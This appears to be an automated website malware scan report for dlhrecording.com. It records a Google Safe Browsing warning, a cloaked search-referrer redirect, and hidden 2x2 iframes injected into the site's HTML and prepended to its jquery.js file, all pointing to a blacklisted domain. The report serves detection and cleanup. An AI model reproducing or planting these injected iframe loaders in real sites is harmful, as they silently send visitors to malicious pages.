Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dlhrecording.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://dlhrecording.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: dlhrecording.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 20 Jan 2015 06:34:18 GMT Location: http://investice-do-nemovitosti.eu/cewf.html?h=680086 Server: Apache Content-Length: 303 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://dlhrecording.com/ | 200 OK Content-Length: 8360 Content-Type: text/html | malicious |
Page code contains blacklisted domain: investice-do-nemovitosti.eu ...[4463 bytes skipped]... > <!--end construction--> <img src="images/greenlogo.jpg" alt="" class="greenlogo" /> </div> <!--end right_pnl--> <br class="spacer" /> </div> <!--end content_bt--> </div> </div> <!--end content--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?i=680086></iframe></body> </html> Malicious iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?i=680086 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?i=680086> | ||
http://dlhrecording.com/js/jquery.js | 200 OK Content-Length: 55945 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=680086></iframe>');
(function(){var _jQuery=window.jQuery,_$=window.$;var jQuery=window.jQuery=window.$=function(selector,context){return new jQuery.fn.init(selector,context);};var quickExpr=/^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/,isSimple=/^.[^:#\[\.]*$/,undefined;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(selector.nodeType){this[0]=selector;thi ...[3520 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?j=680086 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?j=680086> | ||
http://dlhrecording.com/index.html | 200 OK Content-Length: 8360 Content-Type: text/html | malicious |
Page code contains blacklisted domain: investice-do-nemovitosti.eu ...[4463 bytes skipped]... > <!--end construction--> <img src="images/greenlogo.jpg" alt="" class="greenlogo" /> </div> <!--end right_pnl--> <br class="spacer" /> </div> <!--end content_bt--> </div> </div> <!--end content--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?i=680086></iframe></body> </html> Malicious iFrame found. size: 2x2 src: http://investice-do-nemovitosti.eu/cewf.html?i=680086 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://investice-do-nemovitosti.eu/cewf.html?i=680086> | ||
http://dlhrecording.com/test404page.js | 404 Not Found Content-Length: 397 Content-Type: text/html | clean |